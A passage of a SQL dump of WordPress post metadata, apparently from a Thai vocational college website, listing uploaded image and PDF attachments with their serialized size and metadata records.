:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7128, 2947, '_hide_featured', NULL),
(7130, 2961, '_wp_attached_file', '2018/06/2_หลักเกณฑ์การเก็บรักษาข้อมูลจราจรทางคอมพิวเตอร์.ppt'),
(7131, 2963, '_wp_attached_file', '2018/06/ข้อมูลบุคคลากร2560.pdf'),
(7132, 2964, '_wp_attached_file', '2018/06/ข้อมูลบุคคลากร-2561.pdf'),
(7133, 2971, '_wp_attached_file', '2018/06/Trade_01.png'),
(7134, 2971, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:251;s:6:\"height\";i:48;s:4:\"file\";s:20:\"2018/06/Trade_01.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Trade_01-150x48.png\";s:5:\"width\";i:150;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7135, 2972, '_wp_attached_file', '2018/06/Natee-karnka-1.png'),
(7136, 2972, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:670;s:6:\"height\";i:2212;s:4:\"file\";s:26:\"2018/06/Natee-karnka-1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"Natee-karnka-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Natee-karnka-1-91x300.png\";s:5:\"width\";i:91;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"Natee-karnka-1-310x1024.png\";s:5:\"width\";i:310;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"Natee-karnka-1-91x300.png\";s:5:\"width\";i:91;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7145, 2986, '_wp_attached_file', '2018/06/1-1.jpg'),
(7146, 2986, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:837;s:6:\"height\";i:593;s:4:\"file\";s:15:\"2018/06/1-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-1-300x213.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-1-768x544.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:544;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7147, 2987, '_edit_lock', '1529039126:3'),
(7148, 2987, '_edit_last', '3'),
(7149, 2988, '_wp_attached_file', '2018/06/13-6-2561-13-23-22.jpg'),
(7150, 2988, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1062;s:6:\"height\";i:675;s:4:\"file\";s:30:\"2018/06/13-6-2561-13-23-22.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-6-2561-13-23-22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"13-6-2561-13-23-22-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"13-6-2561-13-23-22-768x488.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:488;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"13-6-2561-13-23-22-1024x651.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:651;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-6-2561-13-23-22-400x254.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:254;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7155, 2987, '_hide_featured', NULL),
(7156, 2987, '_wpas_done_all', '1'),
(7157, 2987, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575548691;s:7:\"payload\";a:0:{}}}'),
(7160, 2994, '_edit_lock', '1538452988:3'),
(7161, 2994, '_edit_last', '3'),
(7162, 2995, '_wp_attached_file', '2018/06/13-6-2561-15-38-18.jpg'),
(7163, 2995, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:742;s:6:\"height\";i:116;s:4:\"file\";s:30:\"2018/06/13-6-2561-15-38-18.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-38-18-150x116.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-6-2561-15-38-18-300x47.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:47;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"13-6-2561-15-38-18-400x63.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:63;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7164, 2996, '_wp_attached_file', '2018/06/13-6-2561-15-44-40.jpg'),
(7165, 2996, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:905;s:6:\"height\";i:152;s:4:\"file\";s:30:\"2018/06/13-6-2561-15-44-40.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-44-40-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-6-2561-15-44-40-300x50.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-44-40-768x129.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"13-6-2561-15-44-40-400x67.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:67;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7166, 2997, '_wp_attached_file', '2018/06/13-6-2561-15-48-31.jpg'),
(7167, 2997, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:979;s:6:\"height\";i:366;s:4:\"file\";s:30:\"2018/06/13-6-2561-15-48-31.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-48-31-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-48-31-300x112.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:112;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-48-31-768x287.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:287;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-48-31-400x150.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7168, 2998, '_wp_attached_file', '2018/06/13-6-2561-15-50-31.jpg'),
(7169, 2998, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:774;s:6:\"height\";i:113;s:4:\"file\";s:30:\"2018/06/13-6-2561-15-50-31.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-50-31-150x113.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-6-2561-15-50-31-300x44.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:44;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-50-31-768x112.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:112;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"13-6-2561-15-50-31-400x58.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:58;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7170, 2994, '_hide_featured', NULL),
(7171, 3001, '_wp_attached_file', '2018/06/13-6-2561-15-57-42.jpg'),
(7172, 3001, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1212;s:6:\"height\";i:356;s:4:\"file\";s:30:\"2018/06/13-6-2561-15-57-42.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-57-42-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-6-2561-15-57-42-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-57-42-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"13-6-2561-15-57-42-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-6-2561-15-57-42-400x117.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7175, 3005, '_wp_attached_file', '2018/06/1-2.jpg'),
(7176, 3005, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:837;s:6:\"height\";i:374;s:4:\"file\";s:15:\"2018/06/1-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"1-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"1-2-300x134.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:134;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"1-2-768x343.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:343;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:15:\"1-2-400x179.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:179;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7177, 3006, '_wp_attached_file', '2018/06/14-6-2561-10-42-35.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(7178, 3006, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:839;s:6:\"height\";i:301;s:4:\"file\";s:30:\"2018/06/14-6-2561-10-42-35.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-6-2561-10-42-35-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"14-6-2561-10-42-35-300x108.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:108;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"14-6-2561-10-42-35-768x276.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:276;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"14-6-2561-10-42-35-400x144.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:144;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7181, 3011, '_edit_lock', '1542010489:4'),
(7182, 3011, '_edit_last', '4'),
(7183, 3011, '_hide_featured', NULL),
(7184, 3020, '_edit_lock', '1529303287:4'),
(7185, 3020, '_edit_last', '4'),
(7186, 3020, '_hide_featured', NULL),
(7187, 3024, '_wp_attached_file', '2018/06/ProvinceRayong2-copy.png'),
(7188, 3024, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:657;s:6:\"height\";i:446;s:4:\"file\";s:32:\"2018/06/ProvinceRayong2-copy.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ProvinceRayong2-copy-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ProvinceRayong2-copy-300x204.png\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"ProvinceRayong2-copy-400x272.png\";s:5:\"width\";i:400;s:6:\"height\";i:272;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7189, 3029, '_edit_lock', '1538452471:3'),
(7190, 3029, '_edit_last', '3'),
(7191, 3030, '_wp_attached_file', '2018/06/รายงานการติดตามผลผู้สำเร็จการศึกษา-ปีการศึกษา-2559-เข้าสู่ตลาดแรงงาน-พ.ศ.-2560.pdf'),
(7192, 3029, '_hide_featured', NULL),
(7193, 3034, '_edit_lock', '1529309191:3'),
(7194, 3034, '_edit_last', '3'),
(7195, 3035, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2549.pdf'),
(7196, 3036, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2551.pdf'),
(7197, 3037, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2552.pdf'),
(7198, 3038, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2553.pdf'),
(7199, 3039, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2556.pdf'),
(7200, 3040, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2557.pdf'),
(7201, 3041, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2558.pdf'),
(7202, 3042, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2559.pdf'),
(7203, 3043, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับหน่วยงานภายนอก-ปี-2560.pdf'),
(7204, 3034, '_hide_featured', NULL),
(7205, 3047, '_edit_lock', '1529309572:3'),
(7206, 3047, '_edit_last', '3'),
(7207, 3048, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2557.pdf'),
(7208, 3049, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2558.pdf'),
(7209, 3050, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2559.pdf'),
(7210, 3051, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือกับต่างประเทศ-ปี-พ.ศ.2560.pdf'),
(7211, 3047, '_hide_featured', NULL),
(7212, 3054, '_edit_lock', '1529309876:3'),
(7213, 3054, '_edit_last', '3'),
(7214, 3055, '_wp_attached_file', '2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf'),
(7215, 3064, '_wp_attached_file', '2018/06/17-5-2561-17-56-09.jpg'),
(7216, 3064, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:204;s:6:\"height\";i:51;s:4:\"file\";s:30:\"2018/06/17-5-2561-17-56-09.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"17-5-2561-17-56-09-150x51.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:51;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7217, 3065, '_wp_attached_file', '2018/06/17-5-2561-17-58-52.jpg'),
(7218, 3065, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:136;s:6:\"height\";i:51;s:4:\"file\";s:30:\"2018/06/17-5-2561-17-58-52.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7219, 3066, '_wp_attached_file', '2018/06/17-5-2561-18-03-44.jpg'),
(7220, 3066, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:442;s:6:\"height\";i:323;s:4:\"file\";s:30:\"2018/06/17-5-2561-18-03-44.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-03-44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-03-44-300x219.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:219;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-03-44-400x292.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:292;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7221, 3073, '_wp_attached_file', '2018/06/17-5-2561-17-47-11.jpg'),
(7222, 3073, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:266;s:6:\"height\";i:53;s:4:\"file\";s:30:\"2018/06/17-5-2561-17-47-11.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"17-5-2561-17-47-11-150x53.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:53;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7223, 3074, '_wp_attached_file', '2018/06/17-5-2561-17-54-14.jpg'),
(7224, 3074, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:181;s:6:\"height\";i:55;s:4:\"file\";s:30:\"2018/06/17-5-2561-17-54-14.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"17-5-2561-17-54-14-150x55.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:55;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7225, 3076, '_wp_attached_file', '2018/06/biodiversity-21597-1.jpg'),
(7226, 3076, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:800;s:6:\"height\";i:600;s:4:\"file\";s:32:\"2018/06/biodiversity-21597-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"biodiversity-21597-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"biodiversity-21597-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"biodiversity-21597-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"biodiversity-21597-1-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";